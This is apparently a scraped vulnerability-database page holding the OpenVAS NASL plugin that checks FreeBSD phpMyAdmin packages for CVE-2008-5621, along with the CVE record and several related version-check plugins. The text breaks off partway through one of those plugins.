ID OPENVAS:62970 Type openvas Reporter Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com Modified 2016-09-27T00:00:00
Description
The remote host is missing an update to the system
as announced in the referenced advisory.
#
#VID 54f72962-c7ba-11dd-a721-0030843d3802
# OpenVAS Vulnerability Test
# $
# Description: Auto generated from VID 54f72962-c7ba-11dd-a721-0030843d3802
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisories, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
tag_insight = "The following packages are affected:
phpMyAdmin211
phpMyAdmin";
tag_solution = "Update your system with the appropriate patches or
software upgrades.
http://www.phpmyadmin.net/home_page/security/PMASA-2008-10.php
http://www.milw0rm.com/exploits/7382
http://secunia.com/advisories/33076/
http://www.vuxml.org/freebsd/54f72962-c7ba-11dd-a721-0030843d3802.html";
tag_summary = "The remote host is missing an update to the system
as announced in the referenced advisory.";
if(description)
{
script_id(62970);
script_tag(name:"cvss_base", value:"6.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:S/C:P/I:P/A:P");
script_version("$Revision: 4148 $");
script_tag(name:"last_modification", value:"$Date: 2016-09-27 07:32:19 +0200 (Tue, 27 Sep 2016) $");
script_tag(name:"creation_date", value:"2008-12-23 18:28:16 +0100 (Tue, 23 Dec 2008)");
script_cve_id("CVE-2008-5621");
script_name("FreeBSD Ports: phpMyAdmin211");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com");
script_family("FreeBSD Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/freebsdrel", "login/SSH/success");
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
#
# The script code starts here
#
include("pkg-lib-bsd.inc");
txt = "";
vuln = 0;
bver = portver(pkg:"phpMyAdmin211");
if(!isnull(bver) && revcomp(a:bver, b:"2.11.9.4")<0) {
txt += 'Package phpMyAdmin211 version ' + bver + ' is installed which is known to be vulnerable.\n';
vuln = 1;
}
bver = portver(pkg:"phpMyAdmin");
if(!isnull(bver) && revcomp(a:bver, b:"3.1.1")<0) {
txt += 'Package phpMyAdmin version ' + bver + ' is installed which is known to be vulnerable.\n';
vuln = 1;
}
if(vuln) {
security_message(data:string(txt));
} else if (__pkg_match) {
exit(99); # Not vulnerable.
}
{"id": "OPENVAS:62970", "type": "openvas", "bulletinFamily": "scanner", "title": "FreeBSD Ports: phpMyAdmin211", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "published": "2008-12-23T00:00:00", "modified": "2016-09-27T00:00:00", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=62970", "reporter": "Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2008-5621"], "lastseen": "2017-07-02T21:10:21", "viewCount": 2, "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2017-07-02T21:10:21", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5621"]}, {"type": "freebsd", "idList": ["54F72962-C7BA-11DD-A721-0030843D3802"]}, {"type": "nessus", "idList": ["FEDORA_2008-11221.NASL", "FREEBSD_PKG_54F72962C7BA11DDA7210030843D3802.NASL", "DEBIAN_DSA-1723.NASL", "GENTOO_GLSA-200903-32.NASL", "SUSE_11_0_PHPMYADMIN-090119.NASL", "SUSE_PHPMYADMIN-5935.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310800210", "OPENVAS:63304", "OPENVAS:63257", "OPENVAS:63616", "OPENVAS:136141256231063257", "OPENVAS:136141256231063616", "OPENVAS:136141256231063304", "OPENVAS:136141256231063450", "OPENVAS:63450"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1723-1:67D35"]}, {"type": "exploitdb", "idList": ["EDB-ID:7382"]}, {"type": "phpmyadmin", "idList": ["PHPMYADMIN:PMASA-2008-10"]}, {"type": "gentoo", "idList": ["GLSA-200903-32"]}], "modified": "2017-07-02T21:10:21", "rev": 2}, "vulnersScore": 6.0}, "pluginID": "62970", "sourceData": "#\n#VID 54f72962-c7ba-11dd-a721-0030843d3802\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 54f72962-c7ba-11dd-a721-0030843d3802\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n phpMyAdmin211\n phpMyAdmin\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2008-10.php\nhttp://www.milw0rm.com/exploits/7382\nhttp://secunia.com/advisories/33076/\nhttp://www.vuxml.org/freebsd/54f72962-c7ba-11dd-a721-0030843d3802.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(62970);\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_version(\"$Revision: 4148 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-27 07:32:19 +0200 (Tue, 27 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-12-23 18:28:16 +0100 (Tue, 23 Dec 2008)\");\n script_cve_id(\"CVE-2008-5621\");\n script_name(\"FreeBSD Ports: phpMyAdmin211\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"phpMyAdmin211\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.11.9.4\")<0) {\n txt += 'Package phpMyAdmin211 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"phpMyAdmin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.1.1\")<0) {\n txt += 'Package phpMyAdmin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "FreeBSD Local Security Checks"}
{"cve": [{"lastseen": "2020-10-03T11:51:04", "description": "Cross-site request forgery (CSRF) vulnerability in phpMyAdmin 2.11.x before 2.11.9.4 and 3.x before 3.1.1.0 allows remote attackers to perform unauthorized actions as the administrator via a link or IMG tag to tbl_structure.php with a modified table parameter. NOTE: other unspecified pages are also reachable, but they have the same root cause. NOTE: this can be leveraged to conduct SQL injection attacks and execute arbitrary code.", "edition": 3, "cvss3": {}, "published": "2008-12-17T02:30:00", "title": "CVE-2008-5621", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5621"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:2.11.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.8", "cpe:/a:phpmyadmin:phpmyadmin:2.11.2", "cpe:/a:phpmyadmin:phpmyadmin:2.11.6.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.1.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.1.2", "cpe:/a:phpmyadmin:phpmyadmin:3.0.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.7", "cpe:/a:phpmyadmin:phpmyadmin:2.11.7.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.2.2", "cpe:/a:phpmyadmin:phpmyadmin:2.11.4.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.5.2", "cpe:/a:phpmyadmin:phpmyadmin:3.1.0.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.2", "cpe:/a:phpmyadmin:phpmyadmin:2.11.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.5.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.1.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.3", "cpe:/a:phpmyadmin:phpmyadmin:3.0.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.2.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.0.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.3.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.2.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.5.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.3"], "id": "CVE-2008-5621", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5621", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:40:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5621"], "description": "This host is running phpMyAdmin and is prone to multiple\n CSRF Injection vulnerability.", "modified": "2019-03-06T00:00:00", "published": "2008-12-23T00:00:00", "id": "OPENVAS:1361412562310800210", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800210", "type": "openvas", "title": "phpMyAdmin Multiple CSRF SQL Injection Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_mult_xsrf_vuln.nasl 14010 2019-03-06 08:24:33Z cfischer $\n#\n# phpMyAdmin Multiple CSRF SQL Injection Vulnerabilities\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800210\");\n script_version(\"$Revision: 14010 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-06 09:24:33 +0100 (Wed, 06 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2008-12-23 15:23:02 +0100 (Tue, 23 Dec 2008)\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2008-5621\");\n script_bugtraq_id(32720);\n script_name(\"phpMyAdmin Multiple CSRF SQL Injection Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/7382\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2008-10.php\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/fedora-package-announce/2008-December/msg00784.html\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker execute arbitrary codes in the\n context of the application and can compromise database, modify the data or can compromise the whole web application.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin, phpMyAdmin version 2.11 to 2.11.9.3 and 3.0 to 3.1.0.9.\");\n\n script_tag(name:\"insight\", value:\"This flaw is due to failure in sanitizing user-supplied data before being\n used in the SQL queries via a link or IMG tag to tbl_structure.php with a modified table parameter.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 2.11.9.4 or 3.1.1.0 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running phpMyAdmin and is prone to multiple\n CSRF Injection vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! vers = get_app_version( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( version_in_range( version:vers, test_version:\"2.11\", test_version2:\"2.11.9.3\" ) ||\n version_in_range( version:vers, test_version:\"3.0\", test_version2:\"3.1.0.9\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"2.11.9.4/3.1.1.0\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:56:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5622", "CVE-2008-4775", "CVE-2008-5621"], "description": "The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026.", "modified": "2017-07-07T00:00:00", "published": "2009-01-26T00:00:00", "id": "OPENVAS:63257", "href": "http://plugins.openvas.org/nasl.php?oid=63257", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:026 (phpMyAdmin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_026.nasl 6587 2017-07-07 06:35:35Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:026 (phpMyAdmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows\nremote attackers to inject arbitrary web script or HTML by\nusing db script parameter when register_global php parameter is\nenabled\u00a0(CVE-2008-4775).\n\nCross-site request forgery (CSRF) vulnerability in tbl_structure.php\nallows remote attackers perform SQL injection and execute arbitrary\ncode by using table script parameter (CVE-2008-5621).\n\nMultiple cross-site request forgery (CSRF) vulnerabilities in allows\nremote attackers perform SQL injection by using unknown vectors\nrelated to table script parameter (CVE-2008-5622).\n\nThis update provide the fix for these security issues.\n\nAffected: Corporate 4.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:026\";\ntag_summary = \"The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026.\";\n\n \n\nif(description)\n{\n script_id(63257);\n script_version(\"$Revision: 6587 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 08:35:35 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-26 18:18:20 +0100 (Mon, 26 Jan 2009)\");\n script_cve_id(\"CVE-2008-4775\", \"CVE-2008-5621\", \"CVE-2008-5622\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:026 (phpMyAdmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~2.11.9.4~0.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5622", "CVE-2008-4775", "CVE-2008-5621"], "description": "The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026-1.", "modified": "2018-04-06T00:00:00", "published": "2009-03-02T00:00:00", "id": "OPENVAS:136141256231063450", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063450", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:026-1 (phpMyAdmin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_026_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:026-1 (phpMyAdmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows\nremote attackers to inject arbitrary web script or HTML by\nusing db script parameter when register_global php parameter is\nenabled\u00a0(CVE-2008-4775).\n\nCross-site request forgery (CSRF) vulnerability in tbl_structure.php\nallows remote attackers perform SQL injection and execute arbitrary\ncode by using table script parameter (CVE-2008-5621).\n\nMultiple cross-site request forgery (CSRF) vulnerabilities in allows\nremote attackers perform SQL injection by using unknown vectors\nrelated to table script parameter (CVE-2008-5622).\n\nThis update provide the fix for these security issues.\n\nUpdate:\n\nThe previous update packages wasn't signed, this time they are.\n\nAffected: Corporate 4.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:026-1\";\ntag_summary = \"The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026-1.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63450\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-02 19:11:09 +0100 (Mon, 02 Mar 2009)\");\n script_cve_id(\"CVE-2008-4775\", \"CVE-2008-5621\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:026-1 (phpMyAdmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~2.11.9.4~0.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5622", "CVE-2008-4775", "CVE-2008-5621"], "description": "The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026.", "modified": "2018-04-06T00:00:00", "published": "2009-01-26T00:00:00", "id": "OPENVAS:136141256231063257", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063257", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:026 (phpMyAdmin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_026.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:026 (phpMyAdmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows\nremote attackers to inject arbitrary web script or HTML by\nusing db script parameter when register_global php parameter is\nenabled\u00a0(CVE-2008-4775).\n\nCross-site request forgery (CSRF) vulnerability in tbl_structure.php\nallows remote attackers perform SQL injection and execute arbitrary\ncode by using table script parameter (CVE-2008-5621).\n\nMultiple cross-site request forgery (CSRF) vulnerabilities in allows\nremote attackers perform SQL injection by using unknown vectors\nrelated to table script parameter (CVE-2008-5622).\n\nThis update provide the fix for these security issues.\n\nAffected: Corporate 4.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:026\";\ntag_summary = \"The remote host is missing an update to phpMyAdmin\nannounced via advisory MDVSA-2009:026.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63257\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-26 18:18:20 +0100 (Mon, 26 Jan 2009)\");\n script_cve_id(\"CVE-2008-4775\", \"CVE-2008-5621\", \"CVE-2008-5622\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", 